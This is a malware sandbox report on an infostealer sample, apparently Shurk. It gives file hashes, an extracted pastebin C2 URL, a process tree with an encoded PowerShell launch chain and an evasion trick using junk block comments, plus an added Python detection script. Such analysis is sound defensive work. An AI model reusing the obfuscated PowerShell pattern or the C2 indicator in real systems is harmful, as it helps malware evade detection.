Analysis
- max time kernel: 151s
- max time network: 30s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 01-05-2023 10:45
Behavioral tasks
- behavioral1: Sample Aurora.exe, Resource win7-20230220-en
- behavioral2: Sample Aurora.exe, Resource win10v2004-20230220-en
General
- Target: Aurora.exe
- Size: 25.5MB
- MD5: 5b5049eee909a12420356f785890ee12
- SHA1: 2458920623ab942e1f564cb09ae25fb02b6b76a0
- SHA256: 4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0
- SHA512: 5c7fecb1d55baa008ee4fa90a08c0a1dbbcb2635082a6df51bdacf6fde9fe878f36769fd8099f5a0c371b3e60e5d4ff8e4097bf38346f7167d0a13c9bcdc310c
- SSDEEP: 98304:UlQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxA:QQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRF
Malware Config
- Extracted: https://pastebin.com/raw/tPAFrSUD
  A raw paste on a public paste service, consistent with the "Legitimate hosting services abused for malware hosting/C2" signature below. The paste content is not reproduced on this page.
Signatures
- Shurk
  Shurk is an infostealer, written in C++, which first appeared in 2021.
- Shurk Stealer payload (1 IoC)
  resource: behavioral1/memory/2008-60-0x0000000000400000-0x0000000001D8A000-memory.dmp
  yara_rule: shurk_stealer
  The family verdict rests on this single YARA hit against a memory dump of PID 2008 (Aurora.exe), region 0x400000-0x1D8A000, not on the on-disk sample and not on the dropped LXIX.exe.
- Blocklisted process makes network request (7 IoCs)
  flows 4, 6, 7, 8, 9, 10, 11: PID 1200 powershell.exe (the -EncodedCommand instance)
- Executes dropped EXE (1 IoC)
  PID 2016 LXIX.exe
- Loads dropped DLL (1 IoC)
  PID 2008 Aurora.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  PID 1200 powershell.exe (2 hits), PID 1636 powershell.exe (1 hit), PID 1940 taskmgr.exe (2 hits)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token SeDebugPrivilege: PID 1200 powershell.exe, PID 1636 powershell.exe, PID 1940 taskmgr.exe
- Suspicious use of FindShellTrayWindow (14 IoCs)
  PID 1940 taskmgr.exe (14 hits)
- Suspicious use of SendNotifyMessage (14 IoCs)
  PID 1940 taskmgr.exe (14 hits)
  All FindShellTrayWindow and SendNotifyMessage hits, and two of the five EnumeratesProcesses hits, come from taskmgr.exe (PID 1940), which is a top-level process in the tree and not a descendant of the sample; discount them when scoring the sample.
- Suspicious use of WriteProcessMemory (12 IoCs; three distinct writes, each recorded four times)
  pid   Process          wrote to pid   procid_target
  2008  Aurora.exe       2016           27
  2016  LXIX.exe         1200           28
  1200  powershell.exe   1636           30
  Each entry is a parent writing into the child it has just created, which sandboxes commonly record during ordinary process creation as well as during injection; the report does not show what was written, so these entries alone do not prove code injection.
Processes
- C:\Users\Admin\AppData\Local\Temp\Aurora.exe (PID 2008, top level)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Aurora.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\LXIX.exe (PID 2016, parent 2008)
    Command line: "C:\Users\Admin\AppData\Local\Temp\LXIX.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1200, parent 2016)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1636, parent 1200)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>;
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\taskmgr.exe (PID 1940, top level, not spawned by the sample)
  Command line: "C:\Windows\system32\taskmgr.exe" /4
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

Notes on the tree:
- Both PowerShell instances were invoked by their System32 path but run from SysWOW64. That is WOW64 file-system redirection: the launcher (LXIX.exe, and in turn the first PowerShell) is a 32-bit process, so the encoded command executes in 32-bit PowerShell.
- The encoded command for PID 1200 is not reproduced on this page. PID 1200 is the only process in the chain that makes network requests (flows 4 and 6 through 11), so LXIX.exe acts as a launcher and whatever network activity the sample has is driven by that script.
- PID 1636 only shows a blank dialog with an Error icon ([System.Windows.Forms.MessageBox]::Show('','','OK','Error')). The <#lrf#> and <#mfk#> fragments are PowerShell block comments with no effect; they defeat naive command-line substring matching, so strip <# ... #> before matching.
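Reading the tree above the way a detection engineer would, the following Python is an added example, not part of the sandbox report or of the sample. It reconstructs the process records from the tree as printed (PIDs, image paths, command lines; parent links follow the indentation), substitutes a placeholder for the -EncodedCommand argument that the page does not reproduce, and encodes four checks: a Temp executable spawning another Temp executable, powershell.exe with any prefix of -EncodedCommand, the System32-versus-SysWOW64 mismatch that reveals a 32-bit launcher, and the MessageBox call, matched after PowerShell block comments are stripped. The rule names are the example's own.

```python
"""Added triage helper for the process tree in this report (example code,
not the sandbox's or the sample's). Records are reconstructed from the
tree as printed; the -EncodedCommand value is a placeholder because the
page does not reproduce it."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: Optional[int]   # None for top-level processes in the tree
    image: str            # image path as the sandbox recorded it
    cmdline: str          # command line as launched


# Reconstructed from the report's process tree (constructed sample input).
REPORT_PROCS = [
    Proc(2008, None, r"C:\Users\Admin\AppData\Local\Temp\Aurora.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"'),
    Proc(2016, 2008, r"C:\Users\Admin\AppData\Local\Temp\LXIX.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\LXIX.exe"'),
    Proc(1200, 2016, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
         r'-EncodedCommand "<placeholder: not reproduced in the report>"'),
    Proc(1636, 1200, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
         r"Add-Type -AssemblyName System.Windows.Forms;<#lrf#>"
         r"[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>;"),
    Proc(1940, None, r"C:\Windows\system32\taskmgr.exe",
         r'"C:\Windows\system32\taskmgr.exe" /4'),
]

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def normalize_cmdline(cmdline: str) -> str:
    """Strip PowerShell block comments (<# ... #>) and collapse whitespace.
    The comments carry no semantics, so matching on the stripped form
    survives the junk-comment trick seen in PID 1636."""
    return " ".join(BLOCK_COMMENT.sub("", cmdline).split())


def is_encoded_command_flag(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand
    (-e, -ec, -enc, ...), so match on prefix rather than the full name."""
    if not token.startswith("-"):
        return False
    t = token[1:].lower()
    return bool(t) and "encodedcommand".startswith(t)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def chain(procs, pid: int) -> list:
    """Ancestry of pid, root first, following the tree's parent links."""
    by_pid = {p.pid: p for p in procs}
    out, cur = [], by_pid.get(pid)
    while cur is not None:
        out.append(cur.pid)
        cur = by_pid.get(cur.ppid) if cur.ppid is not None else None
    return out[::-1]


def find_suspicious(procs) -> dict:
    """Return {pid: [rule names]} for every process on which a rule fires."""
    by_pid = {p.pid: p for p in procs}
    hits = {}
    for p in procs:
        parent = by_pid.get(p.ppid) if p.ppid is not None else None
        rules = []
        # Dropped executable in the user's Temp launched by another Temp
        # executable (Aurora.exe -> LXIX.exe in the report).
        if parent and USER_TEMP.search(p.image) and USER_TEMP.search(parent.image):
            rules.append("temp_exe_spawns_temp_exe")
        if basename(p.image) == "powershell.exe":
            norm = normalize_cmdline(p.cmdline)
            tokens = norm.split()
            if any(is_encoded_command_flag(t) for t in tokens):
                rules.append("powershell_encoded_command")
            if parent and USER_TEMP.search(parent.image):
                rules.append("powershell_spawned_from_temp_exe")
            if "MessageBox]::Show(" in norm:
                rules.append("powershell_messagebox")
            # Image under SysWOW64 while the command line names System32:
            # WOW64 file-system redirection, i.e. a 32-bit launcher.
            if tokens and "\\syswow64\\" in p.image.lower() \
                    and "\\system32\\" in tokens[0].lower():
                rules.append("wow64_path_redirection")
        if rules:
            hits[p.pid] = rules
    return hits


if __name__ == "__main__":
    for pid, rules in sorted(find_suspicious(REPORT_PROCS).items()):
        print(pid, "->".join(map(str, chain(REPORT_PROCS, pid))), ", ".join(rules))
```

Run against the reconstructed records, only PIDs 2016, 1200 and 1636 fire; Aurora.exe itself and the top-level taskmgr.exe do not, which matches the reading of the tree above. The prefix matching on -EncodedCommand and the comment stripping are the two parts worth carrying into a real rule, since both are cheap for an attacker to vary and both are visible in this trace.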
Downloads (dropped files)
- (path not recorded)
  Filesize: 73KB
  MD5: decf4a367597bd686ed151ee5af53fdb
  SHA1: 7e6c4789ee9456d3981997e5392b229c1c070e8c
  SHA256: c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a
  SHA512: 49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D0UGIAZYGNZO0K1S7M2S.temp
  Filesize: 7KB
  MD5: bb96e3a75aa1ed7ffc238a8a99f02f02
  SHA1: 995cb410201455bf8519498b33b0f661ae95a282
  SHA256: d48ba7e15a9c17bd365ea93a5a3ef9fcda8895c95c6b94854476663440dbdecc
  SHA512: fb817de7c8ddf0a95b98f7bdbea58430bcdcaf3cc5af07a347cf203d0bfd3cc0960ba60cc46d03f077f2c8298e411f36572d3b8ce69934c37c7c9d96343df4e9
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: bb96e3a75aa1ed7ffc238a8a99f02f02
  SHA1: 995cb410201455bf8519498b33b0f661ae95a282
  SHA256: d48ba7e15a9c17bd365ea93a5a3ef9fcda8895c95c6b94854476663440dbdecc
  SHA512: fb817de7c8ddf0a95b98f7bdbea58430bcdcaf3cc5af07a347cf203d0bfd3cc0960ba60cc46d03f077f2c8298e411f36572d3b8ce69934c37c7c9d96343df4e9

Notes on the dropped files:
- The two CustomDestinations entries have identical hashes: one jump-list file, written first as a .temp and then placed under its final .customDestinations-ms name. Jump lists under Recent\ are maintained by Windows as applications are used; treat them as host execution artifacts, not as payloads written by the sample.
- The 73KB file has no path recorded on this page, so it cannot be tied to a specific process from this report alone; its hashes are the only usable indicator for it.